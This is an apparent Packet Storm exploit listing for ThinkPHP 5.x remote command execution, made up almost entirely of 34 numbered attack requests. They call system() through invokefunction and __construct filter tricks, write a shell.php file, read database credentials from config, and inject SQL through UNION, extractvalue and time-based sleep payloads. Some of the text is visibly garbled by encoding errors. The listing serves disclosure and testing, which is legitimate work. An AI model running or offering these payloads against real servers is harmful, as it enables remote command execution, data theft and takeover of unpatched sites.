ThinkPHP 5.x Remote Command Execution

🗓️ 14 Jan 2019 00:00:00Reported by vr_systemType
packetstorm🔗 packetstormsecurity.com👁 256 Views
ThinkPHP 5.x Remote Command Execution vulnerability details and proof of concept link
`# Exploit Title: thinkphp 5.X RCE  
# Date: 2019-1-14  
# Exploit Author: vr_system  
# Vendor Homepage: http://www.thinkphp.cn/  
# Software Link: http://www.thinkphp.cn/down.html  
# Version: 5.x  
# Tested on: windows 7/10  
# CVE : None  
  
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection  
  
1ahttps://blog.thinkphp.cn/869075  
2ahttps://blog.thinkphp.cn/910675  
  
POCi1/4  
  
thinkphp 5.0.22  
1ahttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username  
2ahttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password  
3ahttp://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id  
4ahttp://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1  
  
thinkphp 5  
5ahttp://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1  
  
thinkphp 5.0.21  
6ahttp://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id  
7ahttp://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1  
  
thinkphp 5.1.*  
8ahttp://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1  
9ahttp://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd  
10ahttp://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E  
11ahttp://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E  
12ahttp://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1  
13ahttp://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd  
14ahttp://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1  
15ahttp://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd  
  
aeacY=cae!  
16a?s=index/\think\module/action/param1/${@phpinfo()}  
17a?s=index/\think\Module/Action/Param/${@phpinfo()}  
18a?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}  
19aindex.php?s=/home/article/view_recent/name/1'   
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"  
20aindex.php?s=/home/shopcart/getPricetotal/tag/1%27  
21aindex.php?s=/home/shopcart/getpriceNum/id/1%27  
22aindex.php?s=/home/user/cut/id/1%27  
23aindex.php?s=/home/service/index/id/1%27  
24aindex.php?s=/home/pay/chongzhi/orderid/1%27  
25aindex.php?s=/home/pay/index/orderid/1%27  
26aindex.php?s=/home/order/complete/id/1%27  
27aindex.php?s=/home/order/complete/id/1%27  
28aindex.php?s=/home/order/detail/id/1%27  
29aindex.php?s=/home/order/cancel/id/1%27  
30aindex.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+  
31aPOST /index.php?s=/home/user/checkcode/ HTTP/1.1  
Content-Disposition: form-data; name="couponid"  
1') union select sleep('''+str(sleep_time)+''')#  
  
thinkphp 5.0.23i1/4a(r)ae'ci1/4debugae"!a1/4  
32a(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx  
  
thinkphp 5.0.23(a(r)ae'c)  
33ai1/4posti1/4public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al  
  
thhinkphp 5.0.10i1/4a(r)ae'ci1/4  
34a(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system  
  
`
14 Jan 2019 00:00Current